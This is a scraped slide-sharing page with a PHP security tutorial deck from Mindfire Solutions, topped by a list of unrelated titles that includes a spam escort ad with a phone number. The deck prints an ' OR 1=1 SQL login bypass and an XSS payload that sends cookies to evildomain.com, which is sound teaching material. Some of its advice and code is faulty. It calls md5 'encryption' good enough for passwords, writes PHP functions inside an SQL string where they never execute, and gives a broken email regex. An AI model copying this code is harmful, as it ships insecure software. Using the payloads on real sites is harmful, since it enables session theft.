TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

PHP Security

  • 2.
  • 3. Consequently PHP applications often end up working with sensitive data a. Unauthorized access to this data is unacceptable. b. To prevent problems a secure design is needed . www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 4. Basic Steps 1.Input fields must be sanitized before being used One of the key concepts you must accept is that user input is unreliable and not to be trusted. Partially lost in transmission between server & client. Corrupted by some in-between process. Modified by the malicoius user in an unexpected manner. Intentional attempt to gain unauthorized access or to crash the application. There are are many ways to sanitize data. One can use php inbuild function for the santization pupose or can use custom defined functions. Eg: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous. if (!empty($_GET['id'])) { $id = (int) $_GET['id']; } else{ $id = 0; } As well as PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 5. if (!ctype_alnum($_GET['login'])) { echo &quot;Only A-Za-z0-9 are allowed.&quot;; } if (!ctype_alpha($_GET['captcha'])) { echo &quot;Only A-Za-z are allowed.&quot;; } You can use also your own customized validation.Like function validateEmail($email){ if($email == &quot;&quot;){ return false; } else{ if(!preg_match(&quot;(^[-]+@([-a-z0-9]+)+[a-z]{2,4}$)i&quot;, $email)){ return false; } else{ return true; } } } www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 6. 2.Data Validations As we all know there are 2 types of validation for a web application. As follows: a. Client side validation b. Server side validation Client side validation is not reliable as an attacker can always bypass the client side validations or can shuts off the client-side script routines, for example, by disabling JavaScript. Hence Server side validation is a must for the security point of view, even if the client-side validation do exists. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 7. 3. Accessing Input Data: There are a series of super-globals which offer very simple access to the input data. $_GET , $_POST, $_SERVER, $_REQUEST Using GET to send sensitive data causes security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string like in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because, the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later. The POST method uses the HTTP body to pass information and this is good in this case because the HTTP body is not logged. Using POST doesn’t offer enough protection. The data’s confidentiality and integrity are still at risk because the information is still sent in clear text. So the use of encryption technique is required, using SSL. Ddata is stored and accessed securely. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 8. 4.Escaping Output Output is anything that leaves your application, bound for a client. The client, in this case, is anything from aWeb browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands. To escape output intended for a Web browser, PHP provides htmlspecialchars()‏ and htmlentities(), EG: $_POST['data'] = “<script>alert('Security issues');</script>”; if (get_magic_quotes_gpc()) { $var = stripslashes($_POST['data']); } echo htmlentities($var ); www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 9. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 10. 5.Register Globals The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Making register global on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled. Why it is a security risk? Let us consider the following block of codes <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?> www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 11. Since $authorized is left un-initialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET. http://example.com/script.php?authorized=1 Solutions: Disable register_globals in PHP.ini. Already done by default as of PHP 4.2.0 . Code with error_reporting set to E_ALL. Allows you to see warnings about the use of un-initialized variables. Type sensitive validation conditions. Because input is always a string, type sensitive compare to a Boolean or an integer will always fail. A best practice is to initialize all variables. Error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 12. 6.Error Reporting: During development, making error reporting turned on is good practise. ini_set('error_reporting',E_ALL); However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development ,your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong. error_reporting(E_ALL^E_NOTICE); // This is a 'sensible' reporting level ini_set('display_errors', 0); // Hide all error messages from the public ini_set('log_errors', 1); ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 13. 7.SQL Injection SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. One of the most common vulnerabilities is when logging in to a site. Take this example: $username = $_POST['username']; $password = $_POST['password']; $result = mysql_query(&quot; SELECT * FROM site_users WHERE username = '$username' AND password = '$password' &quot;); if ( mysql_num_rows($result) > 0 )‏ // logged in www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 14. If the attacker enters a valid username in the username field &quot;rob&quot; and the following in the password field ' OR 1=1 ' The resulting query will look like this: SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1 Since the last crieteria will always be true.The user will be able to log in as rob without knowing rob's password. Prevnting Sql injection: The best way of cleaning input is using PHP's built in mysql_real_escape_string() function, this will escape characters such as ',&quot;&quot; and others. checking the magic quotes is on or off to avoid double escaping. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 15. Function check_sql_injection($var){ if(get_magic_quotes_gpc()) { $var = stripslashes($var); } $var = mysql_real_escape_string($var); return $var; } Now this customized function can be used in sql query to prevent sql injection.. SELECT * FROM site_users WHERE username =check_sql_injection( '$username')‏ AND password = check_sql_injection( '$password)‏ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 16. 8.XSS XSS stands for &quot;Cross Site Scripting&quot;, and refers to the act of inserting content, such as Javascript, into a page. Usually these attacks are used to steal cookies which often contain sensitive data such as login information. EG: $id = $_GET['id']; echo 'Displaying news item number '.$id; An attacker could pass string like this <script>window.location.href = &quot;http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script> If a user passed this simple Javascript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 17. Prevent XSS attacks? This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built in strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 18. 9. Passwords need to be stored securely. Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achivied using md5 command or any stronger method of algorithm. By using this, the attacker wont able access the password of a user. 10. Lock out functionality must be there for the login functionality. An attacker may continue to brute force the login functions until successful. So to prevent the same after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for another a given period of time. For example 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 19. 11.The email forms are vulnerable to email header injection Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed and using captcha during mail form submission. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 20. 12. Using Cookies Securely Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines: Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie. Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible. Consider encrypting information in cookies. Consider setting the Secure and HttpOnly properties on your cookies to true. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 21.
  • 22. For further queries contact us or call 1-248-686-1424 www.mindfiresolutions.com www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions